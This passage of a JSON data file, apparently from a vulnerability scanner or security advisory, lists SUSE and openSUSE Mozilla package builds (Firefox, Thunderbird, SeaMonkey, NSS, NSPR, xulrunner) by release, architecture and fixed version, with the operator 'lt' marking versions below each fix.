"mozilla-nspr-devel-4.8.6-1.6.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-32bit-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-64bit-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-js192-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-64bit-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-certs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.1.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "libfreebl3-64bit-3.12.8-1.1.1.ppc.rpm", "packageName": "libfreebl3-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-translations-other-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.4.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ppc", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.ppc.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.1.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, 